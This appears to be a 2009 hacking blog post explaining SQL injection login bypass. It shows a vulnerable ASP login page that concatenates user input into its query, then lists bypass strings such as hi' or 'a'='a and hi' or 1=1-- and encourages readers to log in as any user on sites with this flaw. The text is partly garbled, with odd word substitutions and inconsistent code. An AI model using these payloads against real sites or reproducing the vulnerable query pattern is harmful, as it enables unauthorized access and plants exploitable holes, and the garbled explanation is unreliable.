Database Servers.

Posted on 02/12/2009 by

5



Databases have been the heart of a profitable website. An attack on the database servers can cause a immense economic loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a profit-making site will bring down its name and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and forewarning database servers. MS sql still owns the market because the price is very low. While forewarning servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable!” But hackers took it as a challenge and showed lots of bugs in it also!! …
This is very useful not only to hackers but also to web designers…A general mistake made by the web designers can reveal the databases of the server to the hacker. Hmmm… The whole game is of query strings. So its assumed that the reader has some knowledge about queries and asp…And this hack is done using only through the browser so you even don’t require any other tools except IE or Netscape.

A Web designer will use this code to make a login page…
Example:
login.htm

<html>
<body>
<form method=get action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>

login check.asp

<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")

set con = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.Create Object("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")

End if
%>

The above code at first site! seems completely fine…And the user will type his/her login name and password in login… htm page and click the submit button. The value of the text boxes will be approved to the logincheck.asp page where it’ll be checked using the query string and if it doesn’t get an entry fulfilling the query it will reach end of the file message and of login failed will be displayed. Everything seems to be all right! But..just a minute…Think again.. What about the query?  Is it all right?…Well if you’ve made a page like this then the hacker can easily login successfully without knowing the password. How? …Here is the querry again.

“Select * from table1 where login=‘”&log& “‘ and password=‘” &pwd& “‘ “

Now if the user types his/her login name as “Ellahax” and password as “h@X3r” then these values will pass to the asp page with the post method and then the above query will become

Select * from table1 where login=’ Ellahax ‘ and password=‘ h@X3r ‘

This is fine…There will be an entry Ellahax and h@X3r in login and password fields in the database so you’ll be given a message as login successful. Now what if I type login name as “Ellahax” and password as
hi’ or ‘a’=’a in the password text box? The query will become as follows:

“Select * from table1 where login=’ Ellahax ‘ and password=‘ hi’ or ‘a’=’a ‘

Then you put it in and Voila!!…You’ll get the message as a Login fruitfully…And now do you see the brains of a hacker which was due to the lack of care of the Web designer?? The query gets pleased as the query changes and the password needs to ‘hi’ or ‘a’ needs to be equal to ‘a’…and clearly the password is not ‘hi’ but the same thing is written as ‘a’=’a’ and the situation is fulfilled and the hacker is in with the login ‘Ellahax’!

Example:

hi” or “a”=”a
hi” or 1=1–
hi’ or 1=1–
hi’ or ‘a’=’a
hi’) or ( ‘a’=a
hi”) or (“a”=”a

The rest of the query string to be a comment and other conditions will not be checked!…The same way you can put…

Example:

Ellahax ‘ —
Ellahax “ —

There are other ways in the login name textbox and password and anything which has a possibility to let you in…because in the query string only login the name is checked as “Ellahax” and the other things are ignored due to –.and if you’re lucky enough you get such a website where the web designer has done the above mistake and then you’ll be able to login as any user!!!

Enjoy! 🙂

Advertisements
Posted in: Hacking, Web Hacing